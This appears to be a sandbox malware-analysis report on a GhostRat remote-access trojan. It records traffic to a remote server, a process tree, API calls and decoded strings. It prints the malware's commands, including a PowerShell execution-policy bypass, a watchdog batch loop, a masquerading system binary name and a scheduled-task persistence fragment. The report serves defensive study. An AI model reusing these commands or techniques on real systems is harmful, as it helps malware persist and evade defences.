Jan 3, 2025 17:20:24.344510078 CET	49880	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:20:24.349442959 CET	17093	49880	156.251.17.243	192.168.2.4
Jan 3, 2025 17:20:39.783663988 CET	49880	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:20:39.788647890 CET	17093	49880	156.251.17.243	192.168.2.4
Jan 3, 2025 17:20:40.089308023 CET	17093	49880	156.251.17.243	192.168.2.4
Jan 3, 2025 17:20:40.142678976 CET	49880	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:20:40.178421974 CET	49880	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:20:40.186419964 CET	17093	49880	156.251.17.243	192.168.2.4

Target ID:	0
Start time:	11:17:42
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\PKHDJwnF0I.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PKHDJwnF0I.exe"
Imagebase:	0x400000
File size:	6'400'844 bytes
MD5 hash:	4F09BB774EC9135BE056F7329EB5BEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:17:43
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:17:43
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:17:43
Start date:	03/01/2025
Path:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Imagebase:	0x400000
File size:	649'416 bytes
MD5 hash:	0922B22053A6D5D9516EA910D34A4771
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2813277197.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3535345010.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3535217900.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2650603870.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3140566966.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3535848822.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2650541111.000000000440D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2525280786.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3301816914.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2976737282.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2525280786.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2650541111.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3301718971.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2976790913.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2813511682.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3460158871.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3140624577.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3460049955.0000000004471000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3535248901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "ShellExperienceHosts.exe"
Imagebase:	0x290000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0xe60000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0xa20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:18:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0xa20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:19:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:19:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "ShellExperienceHosts.exe"
Imagebase:	0x290000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:19:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0xe60000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:19:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:19:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "ShellExperienceHosts.exe"
Imagebase:	0x290000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:19:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0xe60000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:20:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:20:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "ShellExperienceHosts.exe"
Imagebase:	0x290000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:20:24
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0xe60000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	32.6%
Signature Coverage:	8%
Total number of Nodes:	2000
Total number of Limit Nodes:	95

Executed Functions

Function 6C9AE9F0 Relevance: 183.7, APIs: 8, Strings: 96, Instructions: 1734sleepprocessCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C9AEA9C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,?), ref: 6C9AEF71
Sleep.KERNEL32(000000C8,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C9AF3A2
Sleep.KERNEL32(000000C8,?,?), ref: 6C9AFDC8
WinExec.KERNEL32(00000000,00000000), ref: 6C9AFF46
WinExec.KERNEL32(00000000,00000000), ref: 6C9B0097
Sleep.KERNEL32(00007530,?,?,65776F70), ref: 6C9B009E

Part of subcall function 6C9AE9E0: DeleteFileA.KERNEL32(00000000,6C9B00B6,?,?,65776F70), ref: 6C9AE9E1

Concurrency::cancel_current_task.LIBCPMT ref: 6C9B03EC

Strings

dGgg, xrefs: 6C9AEB10
bENv, xrefs: 6C9AECBE
exe , xrefs: 6C9AFFF4
YXRo, xrefs: 6C9AEC00
IHwg, xrefs: 6C9AEC28
\Pol, xrefs: 6C9B04F2
nPol, xrefs: 6C9AFF89
YXNr, xrefs: 6C9AEC96
c3Rl, xrefs: 6C9AEC64
File, xrefs: 6C9AFFAE
PSAi, xrefs: 6C9AEB1A
rshe, xrefs: 6C9AFDE5
LVN0, xrefs: 6C9AEC3C
"Set, xrefs: 6C9AFE12
.30320, xrefs: 6C9AEA70
dGVu, xrefs: 6C9AEBBA
ll -, xrefs: 6C9AFDF4
cmlu, xrefs: 6C9AEC46
ZwpS, xrefs: 6C9AEC50
t.xm, xrefs: 6C9AF108
licy, xrefs: 6C9AFE3A
powe, xrefs: 6C9AFF48
rent, xrefs: 6C9AFE80
IC1Q, xrefs: 6C9AEBF6
YW1l, xrefs: 6C9AECF0
exe , xrefs: 6C9AFECB
5Lu7, xrefs: 6C9AEB74
cuti, xrefs: 6C9AFE26
Exec, xrefs: 6C9AFF70
JHht, xrefs: 6C9AECB4
c2tO, xrefs: 6C9AECE6
icy , xrefs: 6C9AFF93
dC1D, xrefs: 6C9AEBD8
bWUg, xrefs: 6C9AEB60
ICR0, xrefs: 6C9AECFA
anag, xrefs: 6C9AF0FA
d -S, xrefs: 6C9AFE62
WE1M, xrefs: 6C9AEB24
YXNr, xrefs: 6C9AED04
cope, xrefs: 6C9AFE6C
icyM, xrefs: 6C9AF0F3
estr, xrefs: 6C9AFE4E
ZHVs, xrefs: 6C9AEC82
bnRl, xrefs: 6C9AECC8
5Yqh, xrefs: 6C9AEB7E
IEdl, xrefs: 6C9AEBCE
bWwg, xrefs: 6C9AECAA
dGFz, xrefs: 6C9AEB4C
ll -, xrefs: 6C9AFF62
IC1Y, xrefs: 6C9AECA0
ZQ==, xrefs: 6C9AED18
cmd., xrefs: 6C9AFFEA
bFBh, xrefs: 6C9AEB06
5b6E, xrefs: 6C9AEB38
emen, xrefs: 6C9AF101
Unr, xrefs: 6C9AFE44
ci1T, xrefs: 6C9AEC6E
56ew, xrefs: 6C9AEB92
Igok, xrefs: 6C9AEB9C
ZWRU, xrefs: 6C9AEC8C
eG1s, xrefs: 6C9AEBA6
LVRh, xrefs: 6C9AECDC
6Lev, xrefs: 6C9AEB2E
a05h, xrefs: 6C9AEB56
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+CjxUYXNrIHZlcnNpb249IjEuMyIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93cy8yMDA0LzAyL21pdC90YXNrIj4KICA8UmVnaXN0cmF0aW9uSW5mbz4KICAgIDxEYXRlPjIwMDYtMTEtMTBUMTQ6Mjk6NTUuNTg1MTkyNjwvRGF0ZT4KICAgIDxB, xrefs: 6C9AED8F
Igok, xrefs: 6C9AEB42
YXRo, xrefs: 6C9AEC1E
ZW50, xrefs: 6C9AEBEC
Cur, xrefs: 6C9AFE76
bWxQ, xrefs: 6C9AEC14
Bypa, xrefs: 6C9AFF9D
Comm, xrefs: 6C9AFDFE
ICR4, xrefs: 6C9AEC0A
PSAi, xrefs: 6C9AEB6A
dCA9, xrefs: 6C9AEBC4
bnQg, xrefs: 6C9AECD2
5ZCN, xrefs: 6C9AEB88
powe, xrefs: 6C9AFDD4
\Pol, xrefs: 6C9AF0EA
onPo, xrefs: 6C9AFE30
b250, xrefs: 6C9AEBE2
Error retrieving folder path, xrefs: 6C9AEFC4
JHht, xrefs: 6C9AEAFC
and , xrefs: 6C9AFE08
utio, xrefs: 6C9AFF7F
User, xrefs: 6C9AFE8A
ZWdp, xrefs: 6C9AEC5A
cmd., xrefs: 6C9AFEBF
T3V0, xrefs: 6C9AEC32
TmFt, xrefs: 6C9AED0E
Q29u, xrefs: 6C9AEBB0
icte, xrefs: 6C9AFE58
-Exe, xrefs: 6C9AFE1C
rshe, xrefs: 6C9AFF52
ss -, xrefs: 6C9AFFA7
Y2hl, xrefs: 6C9AEC78

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Sleep$ExecFile$Concurrency::cancel_current_taskDeleteFolderModuleNamePath
String ID: Cur$ Unr$"Set$-Exe$.30320$56ew$5Lu7$5Yqh$5ZCN$5b6E$6Lev$Bypa$Comm$Error retrieving folder path$Exec$File$IC1Q$IC1Y$ICR0$ICR4$IEdl$IHwg$Igok$Igok$JHht$JHht$LVN0$LVRh$PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+CjxUYXNrIHZlcnNpb249IjEuMyIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93cy8yMDA0LzAyL21pdC90YXNrIj4KICA8UmVnaXN0cmF0aW9uSW5mbz4KICAgIDxEYXRlPjIwMDYtMTEtMTBUMTQ6Mjk6NTUuNTg1MTkyNjwvRGF0ZT4KICAgIDxB$PSAi$PSAi$Q29u$T3V0$TmFt$User$WE1M$Y2hl$YW1l$YXNr$YXNr$YXRo$YXRo$ZHVs$ZQ==$ZW50$ZWRU$ZWdp$ZwpS$\Pol$\Pol$a05h$anag$and $b250$bENv$bFBh$bWUg$bWwg$bWxQ$bnQg$bnRl$c2tO$c3Rl$ci1T$cmd.$cmd.$cmlu$cope$cuti$d -S$dC1D$dCA9$dGFz$dGVu$dGgg$eG1s$emen$estr$exe $exe $icte$icy $icyM$licy$ll -$ll -$nPol$onPo$powe$powe$rent$rshe$rshe$ss -$t.xm$utio
API String ID: 1974682518-4086079250
Opcode ID: 5f55ac102a12d582b043235e8e153c3f9dbe580a6311a61cafbf0825b3d26808
Instruction ID: f9dd4fa61b2b5767e0dceb499521690785c135d6229c866efa5d20cb5e3756f6
Opcode Fuzzy Hash: 5f55ac102a12d582b043235e8e153c3f9dbe580a6311a61cafbf0825b3d26808
Instruction Fuzzy Hash: 36F2E1B0D012589BDB14CF64CD987EEBBB5AF55308F1082D8E0496BA91DB709BCACF51

Function 032D5430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032DF707: _malloc.LIBCMT ref: 032DF721

_memset.LIBCMT ref: 032D546C
_memset.LIBCMT ref: 032D5485
_memset.LIBCMT ref: 032D5495
gethostname.WS2_32(?,00000032), ref: 032D54A3
gethostbyname.WS2_32(?), ref: 032D54AD
inet_ntoa.WS2_32 ref: 032D54C5
_strcat_s.LIBCMT ref: 032D54D8
_strcat_s.LIBCMT ref: 032D54F1
inet_ntoa.WS2_32 ref: 032D551A
_strcat_s.LIBCMT ref: 032D552D
_strcat_s.LIBCMT ref: 032D5546
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 032D5573
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 032D5587
GetLastInputInfo.USER32(?), ref: 032D559A
GetTickCount.KERNEL32 ref: 032D55A0
wsprintfW.USER32 ref: 032D55D5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 032D55E8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 032D55FC
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 032D5653
wsprintfW.USER32 ref: 032D566C
GetForegroundWindow.USER32 ref: 032D5695
GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 032D56AC
lstrlenW.KERNEL32(000008CC), ref: 032D56D3
lstrlenW.KERNEL32(00000994), ref: 032D5739
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 032D57AA
GetProcAddress.KERNEL32(00000000), ref: 032D57B1
GetNativeSystemInfo.KERNEL32(?), ref: 032D57C2
GetSystemInfo.KERNEL32(?), ref: 032D57CD
wsprintfW.USER32 ref: 032D5806
GetCurrentProcessId.KERNEL32 ref: 032D5818
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 032D582E
K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 032D584B
CloseHandle.KERNEL32(032F5164), ref: 032D587F
GetTickCount.KERNEL32 ref: 032D58E9
__time64.LIBCMT ref: 032D58F8
__localtime64.LIBCMT ref: 032D592F
wsprintfW.USER32 ref: 032D5968
GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 032D597D
GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 032D598C
GetCurrentHwProfileW.ADVAPI32(?), ref: 032D5999

Part of subcall function 032D80F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 032D8132
Part of subcall function 032D80F0: lstrcmpiW.KERNEL32(?,A:\), ref: 032D8166
Part of subcall function 032D80F0: lstrcmpiW.KERNEL32(?,B:\), ref: 032D8176
Part of subcall function 032D80F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 032D81A6
Part of subcall function 032D80F0: lstrlenW.KERNEL32(?), ref: 032D81B7
Part of subcall function 032D80F0: __wcsnicmp.LIBCMT ref: 032D81CE
Part of subcall function 032D80F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 032D8204

Strings

kernel32.dll, xrefs: 032D576F
X86, xrefs: 032D59B1, 032D59D3
REMARK, xrefs: 032D5746
2024.12. 8, xrefs: 032D5758
x86, xrefs: 032D57F4, 032D57F9
GROUP, xrefs: 032D56E0
x64, xrefs: 032D57ED
GetNativeSystemInfo, xrefs: 032D576A
1.0, xrefs: 032D5702
Network, xrefs: 032D56C2, 032D5728
AppEvents, xrefs: 032D56B6, 032D571C
%d min, xrefs: 032D55CF
X86 %s, xrefs: 032D5800

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
String ID: %d min$1.0$2024.12. 8$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
API String ID: 1101047656-235578928
Opcode ID: 4e8b4348ef4de9ce93a0f4115b54b7965f3a2b159b943e8e0c5c5799d430de35
Instruction ID: 0d7cb87b744c4496a1ecd2a57eaf8ab69d0fec134974568ff8c1b248d0c8191f
Opcode Fuzzy Hash: 4e8b4348ef4de9ce93a0f4115b54b7965f3a2b159b943e8e0c5c5799d430de35
Instruction Fuzzy Hash: F1F1D6B5910304AFD724EB64DC85FDBB7B8EF45700F108568E71AA7281EBB0AA84CF55

Function 6C9A72B0 Relevance: 71.2, APIs: 12, Strings: 28, Instructions: 1232fileprocessCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,74DF0F10,00000000), ref: 6C9A72F8
CopyFileA.KERNEL32(IOVA,?,00000000), ref: 6C9A7BCB
CopyFileA.KERNEL32(?,?,00000000), ref: 6C9A7D40

Part of subcall function 6C9A59B0: Concurrency::cancel_current_task.LIBCPMT ref: 6C9A5AF7

OpenProcess.KERNEL32(00000410,00000000,00000000,00000000,00000000,00000001,?,?,?,monitor.pid,0000000B,?,?), ref: 6C9A7FA4
CloseHandle.KERNEL32(00000000,?,?,?,monitor.pid,0000000B,?,?), ref: 6C9A7FAF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,00000001,?,?,?,monitor.pid), ref: 6C9A7FDD
CloseHandle.KERNEL32(?,?,00000002,?,?,?,?,?,monitor.pid,0000000B,?,?), ref: 6C9A81DA
CloseHandle.KERNEL32(?,?,?,?,monitor.pid,0000000B,?,?), ref: 6C9A81E2
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9A8252
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9A82C8
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9A83F3
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9A84A7

Strings

set "ProcessPath=, xrefs: 6C9A74D8
cmd.exe /B /c "%s", xrefs: 6C9A7A07
\backup.dll", xrefs: 6C9A770B
set "BackupProcessPath=, xrefs: 6C9A750B
\backup.dll, xrefs: 6C9A7ADA
